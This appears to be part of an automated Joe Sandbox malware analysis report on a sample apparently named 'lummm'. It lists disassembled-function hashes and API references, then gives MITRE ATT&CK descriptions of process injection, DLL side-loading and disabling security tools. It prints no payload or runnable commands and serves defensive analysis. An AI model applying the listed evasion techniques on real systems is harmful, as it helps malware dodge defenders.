Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9894883aeef3f8d32a8b361b4da19d3bd2fdac868f8076c1d59ddea2bf57e2b8
Instruction ID: 44b53a1fd114cf74b4c4204aa0283f62e392e7c4d9c1a39cb30fb196a62de1f8
Opcode Fuzzy Hash: 9894883aeef3f8d32a8b361b4da19d3bd2fdac868f8076c1d59ddea2bf57e2b8
Instruction Fuzzy Hash: B85111769193009FEB48DF26EC0242ABFF2BBD5310F08C82DE18197326E6799509DF95

Function 007EB180 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8016a66fcc444521d5e7ae544ec59fd7f16f6235349ea454309bac03904dc3e0
Instruction ID: 918d8952a40d17109627ec22ad7cb0b040a5365109c5f95d89c782e71747ebe1
Opcode Fuzzy Hash: 8016a66fcc444521d5e7ae544ec59fd7f16f6235349ea454309bac03904dc3e0
Instruction Fuzzy Hash: 7F314AB1A06345EBD714AA25DC41B7FBB9DFF89354F10882CFA8587251E739EC048792

Function 007BD879 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c29735c4d6b156151e5b09eadcb2133e6447a51b39f572c9a5add93357f0ab4
Instruction ID: b66d8d00ba1a48adf93864ee1524bb9d4a06a0466665e99dde8acd002790788e
Opcode Fuzzy Hash: 9c29735c4d6b156151e5b09eadcb2133e6447a51b39f572c9a5add93357f0ab4
Instruction Fuzzy Hash: 7031CEB0300502FFD7399B28DC95B7673A2EB45395F258A28E04A872A1F778BC52DB45

Function 007BD093 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d325b74607be5dcafe52ea44a260ce0ee0dd87dad88ce1f4dd89ea7914975d58
Instruction ID: dc0d342b1d42211b1c8af3bfbcc21a478eccd109b62fb0b1b78a8ad5e7dd965b
Opcode Fuzzy Hash: d325b74607be5dcafe52ea44a260ce0ee0dd87dad88ce1f4dd89ea7914975d58
Instruction Fuzzy Hash: 07219D7BC907508AC320CB34DC982EAB6E25BF6310F58D628C88927224EA344D01C3C3

Function 007EEF05 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09fe64d914552871539253c2394731f76cf4564084eecb2b5e8e7aae82796a19
Instruction ID: b78c428d169b66cb0f146142b5cab7f66121128a28f224fc78377f739cd25f68
Opcode Fuzzy Hash: 09fe64d914552871539253c2394731f76cf4564084eecb2b5e8e7aae82796a19
Instruction Fuzzy Hash: 1301FC31A5934047C71CDA3848910A7A7A2E7D7328B116B3DC293D72A5D72AD807CA0A

Function 007E7C60 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 8e7fec51e8837b26531bd8f373bcb83823221616296d139543cbdcdf76ff1668
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: FF110633A0E1D00EC31A8D3D8400575BFAB1B97235B298399F4B49B2E6D6268D8AD370

Function 007DB4F0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324bbce0925c4a74f698f9f695438c8bb67048a6437d155b7ac6412620a5125c
Instruction ID: ae01e3ac3020bf2b43160f63d7a11ada6b522fa4b7b62d6c48e1d46d783d6b40
Opcode Fuzzy Hash: 324bbce0925c4a74f698f9f695438c8bb67048a6437d155b7ac6412620a5125c
Instruction Fuzzy Hash: 540171F1601301D7DB209E55A4C5B37B2B86F85704F1D452DE80A5B302EB79FC19C6A5

Function 007D999F Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb6c4962527b2c9a95efc24838b9bb01c705e5c825f473d6a68a0f09a0f6c3a
Instruction ID: 90e5e8fac0df5f79986b02c163f97f34b176c22d2d5426236d2da195724ecd65
Opcode Fuzzy Hash: 1fb6c4962527b2c9a95efc24838b9bb01c705e5c825f473d6a68a0f09a0f6c3a
Instruction Fuzzy Hash: 550192B0604241DBD62E8F15DCA0936B3B2FBC5365F688A1EE64A122A5F23C7C52D706

Function 007ED800 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b89ed253cdabb8e93f2ae5561780c4995563fb17f2ff90155927cb44f76b9948
Instruction ID: a0438fb8f0095b1b5fd813d91ebb6c45ec2f178e7eacf7eaf5b4bfec47420f2e
Opcode Fuzzy Hash: b89ed253cdabb8e93f2ae5561780c4995563fb17f2ff90155927cb44f76b9948
Instruction Fuzzy Hash: 0AF0F472A01248FBD1315A479C44D37B3AEFB8D778F104319F428131A1E366ED11D7A1

Function 007EF9A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8216a6b8a2b82774db3fc36ad209c07221c04bf9f96c9a875b6ecb7307fd56c2
Instruction ID: d2427a482fea34b3b3673e02e0fc3a9b22eb7be557fef5e44d5eba17e1d3295e
Opcode Fuzzy Hash: 8216a6b8a2b82774db3fc36ad209c07221c04bf9f96c9a875b6ecb7307fd56c2
Instruction Fuzzy Hash: D5F02439D1A2904BE34C8F329940737B7E9ABCA780F04C43DE5C597689D4348C02CA29

Function 007CEC10 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: d73a38091097ff7d1354b49322ae475e0829431c1acb081cfdc8ef61f2ef428c
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 4ED0A7715487A50E57688D3814A097BFBE8E947712B18289EE4D1E3105D224EC0156A9

Function 007E5D23 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 007E5D5F
GetSystemMetrics.USER32 ref: 007E5D6E
DeleteObject.GDI32 ref: 007E5DA9
SelectObject.GDI32 ref: 007E5DF0
SelectObject.GDI32 ref: 007E5E48
DeleteObject.GDI32 ref: 007E5E76

Strings

, xrefs: 007E5E1C

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 8e75112ed58b8a9c313f06a2b8d9ca86d7f4692b40f85881bd8022a6a4cfdb45
Instruction ID: cd6047f196acbf7dada62a570dc83d28c649c6bf2a62895ea9a86ecf06405e62
Opcode Fuzzy Hash: 8e75112ed58b8a9c313f06a2b8d9ca86d7f4692b40f85881bd8022a6a4cfdb45
Instruction Fuzzy Hash: 9F5193B08192449FCB00EF79E98565EBFF0BF48304F11852EE4989B354D7389949CF96

Function 007C6E36 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 272COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 007C70A9

Strings

$@ F, xrefs: 007C6FC1
x~, xrefs: 007C6FD1
y{, xrefs: 007C6E64

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $@ F$x~$y{
API String ID: 237503144-3139725477
Opcode ID: 203ae5a0f4f35405abfbd41d4d6028aa4e2408da9a8e85237fdd200e258b44fb
Instruction ID: 0c288703f55262d95d997053dec235ea21aa5df4f3cc3c2aff920646bcde090f
Opcode Fuzzy Hash: 203ae5a0f4f35405abfbd41d4d6028aa4e2408da9a8e85237fdd200e258b44fb
Instruction Fuzzy Hash: 2791D071A083118BC724CF29C8917AAB7E1FFC8750F198A6DE8C99B354E73C9941CB46

Function 007C717A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 007C71B2

Strings

)"4, xrefs: 007C71FB
v, xrefs: 007C71F1

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: )"4$v
API String ID: 237503144-136720058
Opcode ID: e4e1e1b4cad6d31b1903cbe69a825d2c949f747c80427c6b0487bad1305a9982
Instruction ID: 7c50143da347c52b1868535b1181c7e8fa6d109a144e7c3f9b6a6ab80595c014
Opcode Fuzzy Hash: e4e1e1b4cad6d31b1903cbe69a825d2c949f747c80427c6b0487bad1305a9982
Instruction Fuzzy Hash: 2A41237690C341CFD319CF25D8507ABBBE6BBC5310F098A6DA8D583295EB389A05CB53

Analysis Process: powershell.exePID: 2004, Parent PID: 6780COMMON

Executed Functions

Function 07241518 Relevance: 5.6, Strings: 4, Instructions: 583COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072419B0
4'^q, xrefs: 072419BA
4'^q, xrefs: 07241860
4'^q, xrefs: 07241856

Memory Dump Source

Source File: 00000005.00000002.1960842172.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7240000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 4cb709df4d3fd60d9fab398932c59b434aa78980c101e0de37fc0a95ddf5dbcb
Instruction ID: aaa876b22b9af40d5eb67c7bc4315c4d44c742b2fc5ac0b5b66183aa5c81a67e
Opcode Fuzzy Hash: 4cb709df4d3fd60d9fab398932c59b434aa78980c101e0de37fc0a95ddf5dbcb
Instruction Fuzzy Hash: 1A126BB1B2431A9FD7198B6888017AA7FE2AFC1314F1484BAD405CF296DF71CCA5C792

Function 00DF3FB0 Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1955053474.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728bab140b142f1840cb01f58ee8e6ea495b8d1f6906befb84c3335af275bfb6
Instruction ID: 2ff9552e53b8fe10967bfedd6c09a145452a3b77f9af06bcfc7a2c4ada37ff9f
Opcode Fuzzy Hash: 728bab140b142f1840cb01f58ee8e6ea495b8d1f6906befb84c3335af275bfb6
Instruction Fuzzy Hash: A8523A74A002499FCB15CF98C584AAEFBF2FF48310F298559E915AB365C735ED81CBA0

Function 072414FD Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1960842172.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e667ce4a206b9dc01ad7fa774bf07a61472963296d079d6326f5a17e0ab06e66
Instruction ID: 97ccd55b90514392f984888bff102b02d7bf82c3c2ced33060dfd5023c331b1b
Opcode Fuzzy Hash: e667ce4a206b9dc01ad7fa774bf07a61472963296d079d6326f5a17e0ab06e66
Instruction Fuzzy Hash: 224119F1B2030B9FD7288F6885417AA7BE2AF40254F0881A9D4059F256DB71D8E1CBD1

Function 00DF41A8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1955053474.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 654452028e7fb1915cf3582963460a38b8d2b524a68b2a13b2423729b57187ee
Instruction ID: 8b15eaad1754457421c786da35fa289add231de88e3845554e7075cb948a4a1e
Opcode Fuzzy Hash: 654452028e7fb1915cf3582963460a38b8d2b524a68b2a13b2423729b57187ee
Instruction Fuzzy Hash: 0A4138B4A00549CFCB05CF99C5989BAFBB1FF48310B168169DA15AB368C736FD50CBA4

Function 00DF3010 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1955053474.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74123bd8913f06cfa1cea0c0e1d345b401f9067a7c9ffddcc89a63f553b4d49b
Instruction ID: aa8e4709da209b45081308687782e37a66c058f333563e844b41f47889ece25d
Opcode Fuzzy Hash: 74123bd8913f06cfa1cea0c0e1d345b401f9067a7c9ffddcc89a63f553b4d49b
Instruction Fuzzy Hash: 1A2129B4A04219DFCB04CF9CC4819AEBBB4FF89300B16859AE515EB356C735ED41CBA1

Function 00DF3000 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1955053474.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba3b406d2d65ae198a258b644162e07186f43534cbe3d4acb14d6890a7a9286
Instruction ID: 26e55110e7c8301e5820f42d01e1b8da3fdd1557b8bd5a9690430b08ec1ec259
Opcode Fuzzy Hash: 6ba3b406d2d65ae198a258b644162e07186f43534cbe3d4acb14d6890a7a9286
Instruction Fuzzy Hash: E1214A74A002098FCB00DF9CD8809AAFBB0FF89310B15859AE909AB352C731ED41CBA1

Function 00CDD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1954538124.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cdd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640f0366daad101070e651d295b8b1b6741a8c3268c9fb6ea608224a251f36e5
Instruction ID: 7c030a5c28923ee335acfd331f8411757c5a4e9f9ffc153a42d4dfbe0a266e16
Opcode Fuzzy Hash: 640f0366daad101070e651d295b8b1b6741a8c3268c9fb6ea608224a251f36e5
Instruction Fuzzy Hash: 0901406140E3C05ED7128B258894B52BFB8DF53224F1DC1DBD9988F2A7C2695C49C772

Function 00CDD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1954538124.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cdd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7cca9eda901e3420e76f61eb501cad6054db0a29dc074a9e8d7b3b6898d698
Instruction ID: 0401bd83f581ead741d796bf768700cb850047ab3cb560068523adb4c408d02c
Opcode Fuzzy Hash: cd7cca9eda901e3420e76f61eb501cad6054db0a29dc074a9e8d7b3b6898d698
Instruction Fuzzy Hash: BE01F7318083049AE7105A26CDC4B67FF98DF81324F18C52BEE1A4A346C679A981C6B1

Non-executed Functions

Function 07240148 Relevance: 9.1, Strings: 7, Instructions: 318COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07240395
tP^q, xrefs: 072403A1
$^q, xrefs: 07240350
$^q, xrefs: 0724035C
4'^q, xrefs: 0724024B
$^q, xrefs: 0724032A
4'^q, xrefs: 07240257

Memory Dump Source

Source File: 00000005.00000002.1960842172.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7240000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 5036b93b6819f0708511ad38a404d38a0a9dd9ece8134f4f585d85162c7ca990
Instruction ID: 390c77ef41bb422f52f8b217b1c6c655c77c015e5eb515e9decf96b1ed6d06b8
Opcode Fuzzy Hash: 5036b93b6819f0708511ad38a404d38a0a9dd9ece8134f4f585d85162c7ca990
Instruction Fuzzy Hash: D4A17AB2B243568FD7398AB9940036ABFF1AFC1210F1884EBD645CF291DA75CC85C7A1

Function 07242C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07242C3E
$^q, xrefs: 07242C6C
$^q, xrefs: 07242C22
$^q, xrefs: 07242C78

Memory Dump Source

Source File: 00000005.00000002.1960842172.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7240000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f380c2a9de6020a1a783e47bf9e6e0053cceaa2b306c59fbcffb9a19287d907f
Instruction ID: 070fb0e287994a61a5cb812a50a303217e8d85934d4b01853b1315c44b40ebc6
Opcode Fuzzy Hash: f380c2a9de6020a1a783e47bf9e6e0053cceaa2b306c59fbcffb9a19287d907f
Instruction Fuzzy Hash: 192105B173020BDBEB3C55ABC811B27BAD6BBC4715F25882AB405CF395DD75D8418261

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

